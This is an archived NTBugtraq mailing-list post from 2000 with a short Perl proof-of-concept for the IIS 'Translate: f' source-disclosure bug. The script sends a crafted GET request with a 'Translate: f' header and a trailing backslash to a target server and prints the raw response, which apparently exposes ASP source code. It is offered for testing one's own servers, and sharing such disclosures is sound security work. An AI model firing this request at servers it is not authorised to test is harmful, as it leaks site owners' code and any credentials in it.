NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > NTBugtraq> 2000-q3

Subject: Translate: f
From: Monah Khalil (monahkAWALNET.NET.SA)
Date: Wed Aug 16 2000 - 01:33:39 CDT

Next message: Ian Middleton: "Re: RUNAS CMD files fail under Win2K SP1."
Previous message: Elmar van de Brug: "Documents and Settings\Default User.WINNT"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

A perl script to test your servers for the bug:

#!/usr/bin/perl
use IO::Socket;

$query="http://www.targetserver.com/index.asp";
# USING A PROXY SERVER
$host = 'proxy.yourdomain.com';
$port = 8080;

# USING A DIRECT CONNECTION
#$host = 'www.targetserver.com';
#$port = 80;

select STDOUT;
$| = 1;

select(STDOUT); $| = 1;
$handle = IO::Socket::INET->new(Proto => "tcp",
                                PeerAddr => $host,
                                PeerPort => $port, Reuse=>1)
                  or die "can't connect to port $port on $host: $!";
$handle->autoflush(1);
print $handle "GET $query\\ HTTP/1.0\nTranslate: f\r\n\n";

while ($line = <$handle>)
{$content = $content . $line;}
close $handle;

print "Content-type: text/plain\n\n";
print $content;

---
Monah Khalil
Internet Solutions Manager
Al-Faisaliah Internet Services and Technology - AwalNet
Riyadh - KSA
Email: monahkawalnet.net.sa
Tel:   +966 1 4600111 Ext. 404 (office)
Fax:  +966 1 4601110
"...Just remember to look at the 1's and 0's in that data as real money
($$$).
When data is considered to have the same value as money, security controls
on data become a requirement, not an afterthought." --anon
----------------------------------------------------------------------------
Delivery co-sponsored by eEye Digital Security
============================================================================
Vulnerability Is Over ... eEye Digital Security Announces Retina(tm)
Retina, the unparalleled network security product that scans, monitors,
alerts, and automatically fixes network security vulnerabilities. Retina
includes an auto-update feature providing continuous update of its modules,
allowing users to keep pace with the latest security vulnerabilities.
Retina, the first network security software that works like an
around-the-clock human network security analyst.  Available for download;
<http://www.eeye.com/click.asp?referrer=ntbugtraq1&P;=retina>
----------------------------------------------------------------------------

Next message: Ian Middleton: "Re: RUNAS CMD files fail under Win2K SP1."
Previous message: Elmar van de Brug: "Documents and Settings\Default User.WINNT"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]